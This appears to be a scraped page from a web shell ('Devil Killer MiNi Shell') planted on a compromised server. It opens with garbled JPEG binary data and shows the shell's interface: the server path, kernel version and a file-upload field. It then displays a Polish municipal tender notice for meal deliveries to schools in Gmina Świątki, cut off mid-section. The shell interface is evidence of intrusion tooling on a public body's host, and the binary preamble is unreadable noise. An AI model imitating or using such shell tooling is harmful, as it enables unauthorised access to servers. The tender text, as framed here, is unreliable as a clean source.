JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210915/0018091001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa posiłków do Zespołu Szkolno – Przedszkolnego, Żłobka Publicznego oraz innych osób w związku z realizacją programów przez Gminę Świątki w październiku 2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŚWIĄTKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743203</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">87</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świątki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-008</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">896169232</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">896169822</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@swiatki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.swiatki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa posiłków do Zespołu Szkolno – Przedszkolnego, Żłobka Publicznego oraz innych osób w związku z realizacją programów przez Gminę Świątki w październiku 2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-16d0dca3-15ea-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00180910</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.swiatki.pl/?c=179 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postepowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: przetargi@swiatki.pl<br/><br/><br/>2. Wykonawca zamierzający wziąć udział w postepowaniu o udzielenie zamówienia publicznego, musi posiadać́ konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń́ oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/><br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/><br/>5. Za datę̨ przekazania oferty, wniosków, zawiadomień́, dokumentów elektronicznych, oświadczeń́ lub elektronicznych kopii dokumentów lub oświadczeń́ oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/><br/>6. Zamawiający przekazuje link do postepowania oraz ID postepowania jako załącznik do niniejszej SWZ. Dane postepowanie można wyszukać́ również̇ na Liście.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>administratorem Pani/Pana danych osobowych jest Wójt Gminy Świątki – Sławomir Kowalczyk; <br/>inspektorem ochrony danych osobowych w Gminie Świątki jest Pan Marek Hodowski<br/>e - mail: marek.hodowski@swiatki.pl.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Dostawa posiłków do Zespołu Szkolno – Przedszkolnego, Żłobka Publicznego oraz innych osób w związku z realizacją programów przez Gminę Świątki w październiku 2021 ”, znak postępowania: ROS.271.13.2021, prowadzonym w trybie podstawowym.<br/><br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Pzp.<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/><br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego.<br/><br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/><br/>posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/><br/>Nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, <br/>w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">brak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROS.271.13.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia:<br/>) Obiad musi być przygotowany i dostosowany do wieku rozwojowego pod względem<br/>gramatury, wartości odżywczych, kaloryczności i być przygotowywany z zachowaniem norm<br/>żywieniowych dla danej grupy wiekowej, tj. dzieci i młodzież z przedziału 1-15 lat. Posiłki<br/>powinny posiadać odpowiednią temperaturę. Proces produkcji oraz dystrybucji musi się<br/>odbywać zgodnie z wymogami sanitarnymi, zwłaszcza z wymogami dobrej praktyki higienicznej.<br/>2) Posiłki muszą spełniać wymogi żywienia zawarte w n/w aktach i dokumentach:<br/>a) Rozporządzenie (WE) Parlamentu Europejskiego i Rady nr 852/2004 z dnia 29 kwietnia 2004<br/>r. w sprawie higieny środków spożywczych<br/>b) Rozporządzenie (UE) Parlamentu Europejskiego i Rady nr 1169/2011 z dnia 25 października<br/>2011 r. w sprawie przekazywania konsumentom informacji na temat żywności, zmiany<br/>rozporządzeń Parlamentu Europejskiego i Rady (WE) nr 1924/2006 i (WE) nr 1925/2006 oraz<br/>uchylenia dyrektywy Komisji 87/250/EWG, dyrektywy Rady 90/496/EWG, dyrektywy Komisji<br/>1999/10/WE, dyrektywy 2000/13/WE Parlamentu Europejskiego i Rady, dyrektyw Komisji<br/>2002/67/WE i 2008/5/WE oraz rozporządzenia Komisji (WE) nr 608/2004<br/>3) W celu wskazania oczekiwań Zamawiającego, poniżej zostały wymienione warunki<br/>jakościowe i ilościowe:<br/>a) Dzienny jadłospis obejmuje obiad składający się z: zupy, drugiego dania, napoju (kompot/sok)<br/>zgodny z przepisami prawnymi określonymi w ROZPORZĄDZENIU MINISTRA ZDROWIA z<br/>dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży<br/>dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać<br/>środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych<br/>jednostkach.<br/>b) Wymagana gramatura: zupa - 0,5 l drugie danie: - 150g ziemniaki/zamiennik – produkty<br/>zbożowe, - 100 g mięso/ryba, - 150 g surówka/warzywa gotowane, - 200 ml – kompot/sok -<br/>zamiennie danie jarskie nie mniej niż 300 g.<br/>c) Zamawiający nie dopuszcza powtarzalności posiłków w ciągu jednej dekady;<br/>d) Jadłospis dekadowy drugich dań winien obejmować: 2x ryba, 5x mięso, 3x danie jarskie, z<br/>zastrzeżeniem, iż co najmniej raz w tygodniu powinna być podawana porcja ryb (Zamawiający<br/>dopuszcza tylko i wyłącznie filet), a od poniedziałku do piątku muszą być podawane nie więcej<br/>niż dwie porcje potrawy smażonej, przy czym do smażenia jest używany olej roślinny rafinowany<br/>o zawartości kwasów jednonienasyconych powyżej 50% i zawartości kwasów<br/>wielonienasyconych poniżej 40%;<br/>e) w obiedzie musi być co najmniej jedna porcja produktów zbożowych;<br/>f) w każdym posiłku muszą być warzywa lub owoce, w postaci surowej lub przetworzonej;<br/>g) posiłki muszą zawierać produkty z następujących grup środków spożywczych: produkty<br/>zbożowe lub ziemniaki, warzywa lub owoce, mleko lub produkty mleczne, mięso, ryby, jaja,<br/>orzechy, nasiona roślin strączkowych i inne nasiona oraz tłuszcze;<br/>h) zupy, sosy oraz potrawy muszą być sporządzane z naturalnych składników, bez użycia<br/>koncentratów spożywczych, z wyłączeniem koncentratów z naturalnych składników;<br/>i) napoje przygotowywane na miejscu muszą zawierać nie więcej niż 10 g cukrów w 250 ml<br/>produktu gotowego do spożycia;<br/>j) napoje muszą być bez dodatku cukrów i substancji słodzących zdefiniowanych w<br/>rozporządzeniu WE nr 1333/2008;<br/>k) potrawy powinny być lekkostrawne, przygotowywane z surowców wysokiej jakości, świeżych,<br/>naturalnych;<br/>l) w jadłospisie powinny przeważać potrawy gotowane, pieczone i duszone, mięso powinno być<br/>miękkie;<br/>m) posiłki winny być przygotowywane z niską zawartością sodu/soli lub o obniżonej zawartością<br/>sodu/soli<br/>n) zalecane jest różnicowanie smaku sosów;<br/>o) ważna jest estetyka potraw i posiłków;<br/>p) podstawę mięsnej i półmięsnej części drugiego dania nie może stanowić wędlina (kiełbasa,<br/>parówka, itp.);<br/>q) nie dopuszcza się produktów typu: instant, gotowych sosów i ziemniaków w proszku (typu<br/>puree).<br/>4) Zamawiający wymaga przedstawiania przez Wykonawcę do pisemnej akceptacji jadłospisów<br/>w systemie dekadowym.<br/>5) Posiłki należy wydawać z zastosowaniem naczyń ceramicznych (szklanych) i sztućców<br/>umożliwiających utrzymanie ich w czystości, przeznaczonych do kontaktu z żywnością.<br/>6) Wykonawca dostarczy posiłki zachowując wymogi sanitarno-epidemiologiczne w zakresie<br/>personelu, warunków produkcji i dostarczenia oraz weźmie odpowiedzialność za ich<br/>przestrzeganie.<br/>7) Wydawanie posiłków leży po stronie zamawiającego.<br/>8) Czas wydawania posiłków z wyłączną rezerwacją dla dzieci w Żłobku, Przedszkolu :<br/>a) Przedszkole i Żłobek<br/>(a) śniad. 8:10<br/>(b) II śniad. 9:45<br/>(d) ob. 11:30<br/>(e) podw. 13:45<br/>b) Szkoła<br/>(a) 9:40 - 12:35.<br/>9) Ilość posiłków przygotowywanych dziennie dla dzieci Zamawiającego w Przedszkolu i Żłobku<br/>Publicznym :<br/>Pażdziernik 2021 rok - 21 dni<br/>Śniadanie - 112<br/>II śniadanie - 112<br/>Obiad/posiłek szkolny - 165<br/>podwieczorek - 60<br/>10) W oparciu o tą wartość Wykonawca kalkuluje swoją cenę ofertową. Zamawiający na etapie<br/>realizacji przedmiotu zamówienia dopuszcza możliwość zmiany wskazanej wartości zarówno w<br/>górę jak i w dół o 10%. Wskazana ilość nie stanowi ostatecznego wymiaru zamówienia, w<br/>wyniku czego nie może być podstawą do zgłaszania roszczeń z tytułu nie zrealizowanego<br/>przedmiotu zamówienia lub podstawą do odmowy wykonania zamówienia. Wykonawcy będzie<br/>przysługiwało prawo do wynagrodzenia wyłącznie za faktycznie przygotowane i wydane obiady.<br/>11) Wykonawca zobowiązany jest do przechowywania próbek posiłków do celów<br/>sanitarnoepidemiologicznych<br/>zgodnie z obowiązującymi przepisami.<br/>12) Zamawiający zastrzega sobie prawo do dokonywania badań sprawdzających kaloryczność i<br/>wagę zamawianego posiłku.<br/>13) W przypadku stwierdzenia, że posiłek nie spełnia parametrów określonych w zamówieniu,<br/>Zamawiający kosztami badania obciąży Wykonawcę.<br/>2. Miejsce realizacji przedmiotu zamówienia: Przedszkole oraz Żłobek w Świątkach 11-008<br/>Świątki 105 Do obowiązków Wykonawcy należy po każdorazowym zatwierdzeniu dekadowego<br/>jadłospisu przez Zamawiającego, jego wywieszenie do wiadomości rodziców w sposób<br/>zwyczajowo przyjęty w Przedszkolu.<br/>3.A także Posiłki Szkolne z dowozem zorganizowanym w Państwa zakresie do Szkoły<br/>Podstawowej w Świątkach,<br/>Dożywianie dzieci w Przedszkolu i Żłobku odbywać się będzie od poniedziałku do piątku w dni<br/>powszednie w okresie od 01 sierpnia 2021 r. do 31 sierpnia 2021 r. z uwzględnieniem przerw w<br/>działalności (np. dni świątecznych ).<br/>4. Posiłki jednodaniowe do Szkoły Podstawowej obejmują:<br/>1) dwa razy w tygodniu zupa z wkładką mięsną i pieczywem, trzy razy drugie danie + surówka +<br/>sok owocowy lub kompot ( z małą zawartością cukru).<br/>2) Wykonawca będzie podawał tygodniowy jadłospis do wiadomości dyrektora szkóły z co<br/>najmniej tygodniowym wyprzedzeniem. Harmonogram dostarczania posiłków Wykonawca ustali<br/>z Dyrektorem Szkoły.<br/>3) W jadłospisie musi znajdować się informacja o występujących w potrawach alergenach: musi<br/>być sporządzona legenda co oznaczają symbole liczbowe, które muszą być zgodne<br/>z rozporządzeniem Parlamentu Europejskiego i Rady Nr 1169/2011 w sprawie przekazania<br/>konsumentom informacji na temat żywności.<br/>4) Alergeny powinny być podane osobno dla każdej potrawy (dla zupy, dla napoju, dla surówki<br/>itp.).<br/>5) Dzieci powinny otrzymywać trzy razy w tygodni sok lub kompot z niską zawartością cukru,<br/>nieprzekraczającą dopuszczalnej normy oraz trzy razy w tygodniu surówkę.<br/>6) W każdym dniu powinna być co najmniej jedna porcja z grupy mięs, jaja, orzechów, nasion<br/>strączkowych oraz warzyw i owoców (zupy muszą być wzbogacone wkładką mięsną).<br/>7) Co najmniej raz w tygodniu powinna być podawana porcja rybna.<br/>8) Temperatura posiłków powinna mieć odpowiedną temperaturę- zupa 75oC, drugie danie<br/>63oC, w związku z tym posiłki powinny być dostarczone do szkoły w odpowiednich godzinach<br/>ustalonych z Dyrektorem Szkoły Podstawowej w Świątkach.<br/>9) Wykonawca będzie dostarczać posiłki własnym transportem, na własny koszt w<br/>specjalistycznych termosach gwarantujących utrzymanie odpowiedniej temperatury oraz jakości<br/>przewożonych potraw.<br/>10) Posiłki muszą być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla<br/>żywienia zbiorowego nie później niż 12 godzin przed spożyciem. Muszą być wykonywane ze<br/>świeżych artykułów spożywczych posiadających aktualne terminy ważności.<br/>11) Dowożone posiłki winny być dostarczone w termosach zapewniających zachowanie<br/>odpowiedniej temperatury przy ich spożywaniu. Wykonawca zadba o czystość termosów,<br/>w których odbywać się będzie transport posiłków. Wykonawca będzie przygotowywał i<br/>dostarczał posiłki zachowując wymogi sanitarno – epidemiologiczne w zakresie personelu i<br/>warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55322000-3 - Usługi gotowania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin Płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz 